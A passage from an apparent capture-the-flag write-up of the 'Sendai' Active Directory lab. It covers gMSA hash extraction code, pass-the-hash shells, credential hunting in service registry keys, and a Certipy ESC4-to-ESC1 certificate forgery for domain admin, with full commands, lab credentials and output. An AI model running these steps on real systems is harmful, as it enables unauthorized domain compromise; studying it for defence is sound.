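        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl(a + fn(b, c, d) + X[idx] + k, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def _wide_string(buf, start):
    """UTF-16LE bytes from start up to (not including) the 00 00 terminator."""
    i = start
    while i + 1 < len(buf) and buf[i:i + 2] != b"\x00\x00":
        i += 2
    return buf[start:i]


def parse_managed_password(blob):
    version, _, length, cur_off, prev_off, query_off, _ = struct.unpack_from(HEADER, blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    current = _wide_string(blob, cur_off)
    previous = _wide_string(blob, prev_off) if prev_off else b""
    query_interval, unchanged_interval = struct.unpack_from("<QQ", blob, query_off)
    day = 10**7 * 86400                                    # intervals are 100-ns ticks
    return {
        "current_nt_hash": md4(current).hex(),             # NT hash = MD4 over the UTF-16LE password bytes
        "previous_nt_hash": md4(previous).hex() if previous else None,
        "current_length": len(current),
        "query_interval_days": query_interval / day,        # time until the DC rotates the password
        "unchanged_interval_days": unchanged_interval / day,
    }


def build_managed_password_blob(current, previous=b"", query_interval=0, unchanged_interval=0):
    """Constructed test-vector builder following the MS-ADTS layout (for this example only)."""
    cur = current + b"\x00\x00"
    prev = previous + b"\x00\x00" if previous else b""
    cur_off = struct.calcsize(HEADER)                       # 16
    prev_off = cur_off + len(cur) if previous else 0
    body_end = cur_off + len(cur) + len(prev)
    pad = (-body_end) % 8                                   # AlignmentPadding to a 64-bit boundary
    query_off = body_end + pad
    unchanged_off = query_off + 8
    header = struct.pack(HEADER, 1, 0, unchanged_off + 8, cur_off, prev_off, query_off, unchanged_off)
    return header + cur + prev + b"\x00" * pad + struct.pack("<QQ", query_interval, unchanged_interval)


# Constructed sample: the managed password is the UTF-16LE form of "password", so the result
# is the well-known NT hash 8846f7eaee8fb117ad06bdd830b7586c. A real gMSA password is a long
# KDS-derived random value that does not spell anything printable.
SAMPLE_BLOB = build_managed_password_blob("password".encode("utf-16-le"),
                                          query_interval=30 * 86400 * 10**7)

if __name__ == "__main__":
    for key, value in parse_managed_password(SAMPLE_BLOB).items():
        print(f"{key}: {value}")
```

The parser stops at the UTF-16 null terminator rather than slicing by the next offset, so it is indifferent to the alignment padding between the password and the interval fields. The query interval tells you how long a dumped gMSA hash stays valid; once the DC rolls the password the hash is dead and the attribute has to be read again.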
Now we can pass that hash with evil-winrm to get a shell as mgtsvc$
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H eb19b37b20218824d3c29f753fd5f607
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> whoami
sendai\mgtsvc$
Privilege Escalation
The mgtsvc$ home directory is quite empty. Administrator and sqlsvc are the only other two users with home directories in \Users:
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/18/2023 6:09 AM Administrator
d----- 8/27/2025 8:38 AM mgtsvc$
d-r--- 7/11/2023 12:36 AM Public
d----- 8/18/2025 5:05 AM sqlsvc
The C: drive has the standard directories, plus the SMB shares:
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2025 10:19 PM config
d----- 4/15/2025 8:20 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 4/15/2025 7:51 PM Program Files
d----- 7/18/2023 6:11 AM Program Files (x86)
d----- 10/23/2025 10:19 PM sendai
d----- 7/11/2023 2:35 AM SQL2019
d-r--- 10/23/2025 10:33 PM Users
d----- 8/18/2025 5:04 AM Windows
-a---- 4/15/2025 8:27 PM 32 user.txt
There’s an interesting file in inetpub
PS C:\> ls inetpub\DeviceHealthAttestation\bin
Directory: C:\inetpub\DeviceHealthAttestation\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2025 4:53 AM 208896 hassrv.dll
The process list via Get-Process shows a few things worth looking into:
*Evil-WinRM* PS C:\inetpub> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
78 6 1728 6056 3968 0 AggregatorHost
391 34 12484 21772 2352 0 certsrv
81 6 2268 4012 3652 0 cmd
150 11 6624 13264 3660 0 conhost
573 23 2196 6524 432 0 csrss
176 12 1964 6068 532 1 csrss
412 34 16484 25328 3088 0 dfsrs
198 13 2312 8584 3420 0 dfssvc
281 15 3916 15064 3808 0 dllhost
10389 7476 129396 128360 2736 0 dns
633 26 19164 46676 356 1 dwm
165 12 23380 17232 5052 0 EC2Launch
72 6 784 3772 3572 0 EC2LaunchService
39 7 1536 4132 4952 1 fontdrvhost
39 7 1376 3732 4956 0 fontdrvhost
198 12 12324 12676 3100 0 helpdesk
0 0 60 8 0 0 Idle
148 13 1908 6376 3080 0 ismserv
463 27 12228 48992 5616 1 LogonUI
2104 187 73820 73876 680 0 lsass
528 31 36952 48296 2644 0 Microsoft.ActiveDirectory.WebServices
215 14 1928 4068 5948 0 MicrosoftEdgeUpdate
239 14 3100 11528 4268 0 msdtc
0 13 1996 12488 100 0 Registry
645 16 5956 14932 664 0 services
57 4 1108 1256 312 0 smss
446 23 5576 16832 1968 0 spoolsv
703 32 38324 52188 5512 0 sqlceip
757 59 369212 246832 3128 0 sqlservr
147 11 1848 8468 3136 0 sqlwriter
459 19 3736 13040 376 0 svchost
EC2Launch and EC2LaunchService are interesting, and so is a process called helpdesk (this line comes from a second Get-Process run, hence the different counters):
198 12 12276 12640 3084 0 helpdesk
This account doesn’t have permissions to Get-Service, but I can look at the service-related registry keys. The Edge and EC2 ones are there running from their installation directories:
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String ec2
@{ImagePath="C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"}
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String MicrosoftEdge
@{ImagePath="C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc}
@{ImagePath="C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc}
The helpdesk one is in C:\Windows, but more interestingly seems to have credentials in the command:
*Evil-WinRM* PS C:\inetpub> Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String helpdesk
@{ImagePath=C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs}
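The registry check above generalises into a small credential-hunting pass over every service's ImagePath, since credentials on a service command line show up in exactly this way. The Python below is an added example (my code, not part of the write-up) that scans a set of ImagePath values for the usual ways credentials are passed on a command line; the helpdesk value mirrors the finding above, the other sample values are constructed.

```python
"""Look for credentials embedded in service ImagePath values. Added example, not part
of the original write-up; the sample values below are constructed (the helpdesk one
mirrors the page's finding, the rest are invented)."""
import re

SAMPLE_IMAGEPATHS = {
    "helpdesk": r"C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs",
    "EC2LaunchService": r'"C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"',
    "edgeupdate": r'"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc',
    "backupagent": r'C:\svc\backup.exe /user:CORP\backup /password:"Spring 2024!" /quiet',
    "reportsync": r'C:\svc\sync.exe --conn "Server=dc;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;"',
}

# Each pattern captures (user, password). A value is either a double-quoted string
# (which may contain spaces) or a bare token.
_Q = r'"[^"]*"'
CRED_PATTERNS = [
    # getopt style:  -u user -p pass,  --user user --password pass
    re.compile(rf'(?:^|\s)(?:-u|--user(?:name)?)\s+({_Q}|\S+).*?\s(?:-p|--pass(?:word)?)\s+({_Q}|\S+)', re.I),
    # Windows style:  /user:user /password:pass  (also /user=... /password=...)
    re.compile(rf'/user(?:name)?[:=]({_Q}|\S+).*?/pass(?:word)?[:=]({_Q}|\S+)', re.I),
    # key=value style, e.g. a connection string:  User Id=x;Password=y
    re.compile(rf'user(?:name|\s*id)?\s*=\s*({_Q}|[^\s;"]+).*?password\s*=\s*({_Q}|[^\s;"]+)', re.I),
]


def _unquote(value):
    return value[1:-1] if len(value) >= 2 and value[0] == value[-1] == '"' else value


def find_service_credentials(imagepaths):
    """Return [(service, user, password)] for every ImagePath that matches a pattern."""
    hits = []
    for service, path in imagepaths.items():
        for pattern in CRED_PATTERNS:
            m = pattern.search(path)
            if m:
                hits.append((service, _unquote(m.group(1)), _unquote(m.group(2))))
                break
    return hits


if __name__ == "__main__":
    for service, user, password in find_service_credentials(SAMPLE_IMAGEPATHS):
        print(f"{service}: {user} / {password}")
```

Feed it the real ImagePath values (from the Get-ItemProperty loop above, or reg query offline from a saved SYSTEM hive) and treat each hit as a lead to verify with netexec, as the write-up does next; a bare -u or -p is not always a credential.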
Let's verify these credentials
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec smb DC.sendai.vl -u clifford.davey -p RFmoB2WplgE_3p
SMB 10.129.247.57 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.129.247.57 445 DC [+] sendai.vl\clifford.davey:RFmoB2WplgE_3p
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ netexec winrm DC.sendai.vl -u clifford.davey -p RFmoB2WplgE_3p
WINRM 10.129.247.57 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
WINRM 10.129.247.57 5985 DC [-] sendai.vl\clifford.davey:RFmoB2WplgE_3p
Back in BloodHound, Clifford.Davey is a member of the CA-Operators group:
![[Pasted image 20251024163520.png]]
I’ll scan the ADCS instance with Certipy to check for vulnerable templates:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad find -vulnerable -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 16 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'sendai-DC-CA'
[*] Checking web enrollment for CA 'sendai-DC-CA' @ 'dc.sendai.vl'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sendai-DC-CA
DNS Name : dc.sendai.vl
Certificate Subject : CN=sendai-DC-CA, DC=sendai, DC=vl
Certificate Serial Number : 326E51327366FC954831ECD5C04423BE
Certificate Validity Start : 2023-07-11 09:19:29+00:00
Certificate Validity End : 2123-07-11 09:29:29+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SENDAI.VL\Administrators
Access Rights
ManageCa : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
ManageCertificates : SENDAI.VL\Administrators
SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
Enroll : SENDAI.VL\Authenticated Users
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-11T12:46:12+00:00
Template Last Modified : 2023-07-11T12:46:19+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Owner Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Dacl Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\ca-operators
Write Property Enroll : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
[+] User Enrollable Principals : SENDAI.VL\Domain Computers
SENDAI.VL\ca-operators
[+] User ACL Principals : SENDAI.VL\ca-operators
[!] Vulnerabilities
ESC4 : User has dangerous permissions.
The SendaiComputer template is vulnerable to ESC4 from this user: ca-operators has Full Control over the template object, so we can rewrite it into a template that is vulnerable to ESC1 and then enroll. Certipy's template command does the rewrite. Note that -no-save skips the backup of the old configuration; without it Certipy saves the original attributes to a JSON file, which you want on a real engagement so the template can be restored afterwards. Now let's exploit it step by step
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad template -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -template SendaiComputer -write-default-configuration -no-save
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'SendaiComputer'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Minimal-Key-Size: 2048
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SendaiComputer'? (y/N): y
[*] Successfully updated 'SendaiComputer'
If I run the same find -vulnerable scan again, this time it shows ESC1 as well:
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.
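It helps to see what the rewrite actually flipped. The values Certipy printed are raw msPKI-* attributes: msPKI-Certificate-Name-Flag went from SubjectAltRequireDns (0x08000000) to 1 (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT), msPKI-Enrollment-Flag from AutoEnrollment (0x20) to 0, the EKU list to Client Authentication only, and the nTSecurityDescriptor to a single ACE granting 0x000F01FF (full control, including Enroll) to S-1-5-11, Authenticated Users. The Python below is an added example, not Certipy's code: it decodes those flag bits (values from MS-CRTD) and checks the ESC1 conditions against the template before and after the rewrite. msPKI-RA-Signature was not printed in the rewrite output and is assumed to be 0, as it was before.

```python
"""Decode the msPKI-* template flags Certipy printed and check the ESC1 conditions on
SendaiComputer before and after the ESC4 rewrite. Added example, not Certipy's code;
flag bits are from MS-CRTD sections 2.26 and 2.28."""

NAME_FLAGS = {                                    # msPKI-Certificate-Name-Flag
    0x00000001: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT",
    0x00010000: "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME",
    0x02000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_UPN",
    0x08000000: "CT_FLAG_SUBJECT_ALT_REQUIRE_DNS",
    0x40000000: "CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME",
}
ENROLLMENT_FLAGS = {                              # msPKI-Enrollment-Flag
    0x00000002: "CT_FLAG_PEND_ALL_REQUESTS",      # "Requires Manager Approval"
    0x00000020: "CT_FLAG_AUTO_ENROLLMENT",
    0x00080000: "CT_FLAG_NO_SECURITY_EXTENSION",  # matters for ESC9, not ESC1
}
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Domain Computers counts as low-privileged: any user can normally add machine accounts (MachineAccountQuota).
LOW_PRIV = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def decode_flags(value, table):
    """Names of the bits set in value, in bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def evaluate_esc1(template):
    """ESC1 = low-priv Enroll + client-auth EKU + enrollee supplies the subject,
    with no manager approval and no authorized signatures. Returns (is_esc1, reasons_it_is_not)."""
    reasons = []
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT unset: the CA builds the subject/SAN from AD")
    ekus = set(template["pKIExtendedKeyUsage"])
    if ekus and not ekus & CLIENT_AUTH_EKUS:      # an empty EKU list means any purpose
        reasons.append("no client-authentication EKU")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        reasons.append("authorized signatures required")
    if not set(template["enrollment_rights"]) & LOW_PRIV:
        reasons.append("no low-privileged principal holds Enroll")
    return (not reasons, reasons)


# SendaiComputer as `certipy find` reported it above, translated to raw attribute values.
SENDAI_COMPUTER_BEFORE = {
    "msPKI-Certificate-Name-Flag": 0x08000000,    # SubjectAltRequireDns
    "msPKI-Enrollment-Flag": 0x00000020,          # AutoEnrollment
    "msPKI-RA-Signature": 0,                      # Authorized Signatures Required: 0
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],  # Server + Client Authentication
    "enrollment_rights": ["Domain Admins", "Domain Computers", "Enterprise Admins"],
}
# SendaiComputer after `certipy template -write-default-configuration`, from that output.
# Enroll for Authenticated Users is decoded from the nTSecurityDescriptor it wrote (one
# ACCESS_ALLOWED ACE, mask 0x000F01FF, for S-1-5-11); msPKI-RA-Signature is assumed 0.
SENDAI_COMPUTER_AFTER = {
    "msPKI-Certificate-Name-Flag": 1,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["Authenticated Users"],
}

if __name__ == "__main__":
    for label, t in (("before", SENDAI_COMPUTER_BEFORE), ("after", SENDAI_COMPUTER_AFTER)):
        print(label, decode_flags(t["msPKI-Certificate-Name-Flag"], NAME_FLAGS),
              decode_flags(t["msPKI-Enrollment-Flag"], ENROLLMENT_FLAGS), evaluate_esc1(t))
```

Run against the "before" template, the only failing condition is the subject flag: the original SendaiComputer already allowed client authentication and needed no approval, so a single attribute change (plus the permissive ACL) turned ESC4 into ESC1. That is also why restoring the template after the engagement matters.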
ESC1 means the enrollee now supplies the subject and SAN on a template that allows client authentication, so I can request a certificate carrying the Administrator's UPN. The -sid option embeds the account's SID in the certificate's security extension; on DCs that enforce strong certificate mapping (KB5014754), a certificate without it would not be accepted for PKINIT. The domain SID is in the BloodHound data collected earlier; RID 500 is the built-in Administrator:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad req -u clifford.davey -p RFmoB2WplgE_3p -dc-ip 10.129.247.57 -ca sendai-DC-CA -target DC.sendai.vl -template SendaiComputer -upn administrator@sendai.vl -sid S-1-5-21-3085872742-570972823-736764132-500
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 7
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate object SID is 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Then use the resulting .pfx to authenticate with PKINIT; Certipy obtains a TGT and also recovers the account's NT hash:
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.247.57
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sendai.vl'
[*] SAN URL SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Security Extension SID: 'S-1-5-21-3085872742-570972823-736764132-500'
[*] Using principal: 'administrator@sendai.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
Now we can pass that hash over WinRM to get a shell as administrator
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Sendai]
└─$ evil-winrm -i DC.sendai.vl -u administrator -H cfb106feec8b89a3d98e14dcbe8d087a
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sendai\administrator
Description
Sendai is a medium-difficulty AD box: anonymous SMB and RID brute force reveal expired/weak accounts; resetting thomas.powell yields a domain foothold. BloodHound shows abuse paths to the MGTSVC$ GMSA for DC RCE, and ADCS misconfiguration plus clifford.davey’s CA-OPERATORS rights let an attacker forge an admin certificate (via Certipy ESC4/ESC1), extract the NT hash and WinRM to achieve full domain compromise.